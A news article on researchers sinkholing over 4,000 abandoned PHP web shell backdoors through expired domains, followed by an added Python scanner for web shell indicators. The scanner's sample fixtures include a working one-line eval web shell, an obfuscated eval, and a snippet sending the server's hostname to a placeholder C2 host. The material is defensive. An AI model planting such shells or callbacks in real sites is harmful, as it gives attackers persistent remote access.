Over 4K active hacker backdoors found in expiring or abandoned domains

Security researchers discovered and hijacked over 4,000 unique web backdoors that had been deployed by various threat actors. The backdoors, which had been abandoned or were reliant on expired infrastructure, were seized and sinkholed by WatchTowr Labs through the purchase and registration of over 40 domain names that these backdoors used for command-and-control (C2) communications. The firm managed to gain control of the compromised systems for as little as $20 per domain.

The backdoors, which are essentially web shells designed to maintain persistent remote access to target networks, varied significantly in scope and functionality. Some of the backdoors were relatively simple, capable of executing attacker-provided commands via PHP-based tools like c99shell and r57shell, while other tools such as China Chopper were more sophisticated. The latter is a web shell associated with Chinese state-backed hacker groups.

Among the systems hosting those 4,000 unique, live backdoors were government entities in Bangladesh, China, and Nigeria, as well as academic institutions in China, South Korea, and Thailand.

The researchers said that several of the web shells had been backdoored by their original maintainers, inadvertently leaking critical information about the locations and entities where they had been deployed. This allowed other threat actors to hijack the backdoors and further use them for their own purposes.
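The two defender-relevant patterns in this story are the web shell itself (a PHP file that hands request parameters to an execution function, often behind a layer of base64 or gzip obfuscation) and the "backdoored backdoor" that reports its location to a hardcoded host, which is what let an expired domain become a takeover point. The following heuristic scanner is an added example written for this article; it is not code from WatchTowr Labs or from the article. It runs over a small set of constructed PHP snippets (the file paths, contents and the host `c2.example.invalid` are invented for illustration) and reports which of the three patterns each file matches, plus the list of hardcoded callback hosts a defender would then check for expiry or sinkholing.

```python
"""Heuristic PHP web shell indicators, run over constructed sample files.

Added example for this article; not WatchTowr code. The regexes are
intentionally coarse: they are triage indicators, not a malware classifier.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Request-controlled inputs that a web shell typically reads commands from.
REQUEST_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
# Functions that execute code or OS commands.
EXEC_SINKS = r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\("

RULES = {
    # A request superglobal appears inside the argument list of an exec sink.
    "request_to_exec": re.compile(EXEC_SINKS + r"[^;]*" + REQUEST_SOURCES, re.I),
    # Payload is decoded/inflated immediately before being eval'd.
    "decoded_eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I
    ),
    # Outbound connection to a hardcoded hostname: the phone-home pattern that
    # leaks the shell's deployment location to whoever owns the domain.
    "callback_host": re.compile(
        r"\b(?:curl_init|file_get_contents|fsockopen|gethostbyname|dns_get_record)"
        r"\s*\(\s*['\"](?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})",
        re.I,
    ),
}


@dataclass(frozen=True)
class Finding:
    path: str
    rule: str
    detail: str  # matched text, or the captured host for callback_host


def scan_source(path: str, source: str) -> list[Finding]:
    """Return every rule hit in one file's source text."""
    findings: list[Finding] = []
    for name, rx in RULES.items():
        for m in rx.finditer(source):
            detail = m.group(1) if rx.groups else m.group(0)
            findings.append(Finding(path, name, detail.strip()))
    return findings


def scan_tree(files: dict[str, str]) -> dict[str, list[Finding]]:
    """Scan a mapping of path -> source; keep only files with at least one hit."""
    results: dict[str, list[Finding]] = {}
    for path, source in files.items():
        hits = scan_source(path, source)
        if hits:
            results[path] = hits
    return results


def callback_hosts(results: dict[str, list[Finding]]) -> list[str]:
    """Distinct hardcoded hosts the flagged files talk to. The next step, done
    offline here, is to check each one's registration status: an expired or
    unregistered host means anyone can register it and inherit the callbacks."""
    return sorted({f.detail.lower() for hits in results.values() for f in hits
                   if f.rule == "callback_host"})


# Constructed sample web root (not real files; hostnames are placeholders).
SAMPLE_FILES = {
    # One-line command shell reading its command from a request parameter.
    "uploads/img.php": "<?php @eval($_POST['cmd']); ?>",
    # Obfuscated payload decoded before execution (decodes to the string 'hello').
    "cache/tpl.php": "<?php eval(base64_decode('aGVsbG8=')); ?>",
    # Shell that reports the host it is running on to a hardcoded address.
    "inc/helper.php": (
        "<?php $h = fsockopen('c2.example.invalid', 80);"
        " fwrite($h, $_SERVER['HTTP_HOST']); ?>"
    ),
    # Legitimate code: uses a superglobal, but never feeds it to an exec sink.
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    found = scan_tree(SAMPLE_FILES)
    for path, hits in found.items():
        for f in hits:
            print(f"{path}: {f.rule} ({f.detail})")
    print("callback hosts to check for expiry:", callback_hosts(found))
```

Each rule is deliberately narrow so that ordinary application code such as `index.php` above stays out of the report; a real deployment would pair this with file-integrity baselines, since the article's point is that a shell can sit unnoticed long after its operator has lost interest in it.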
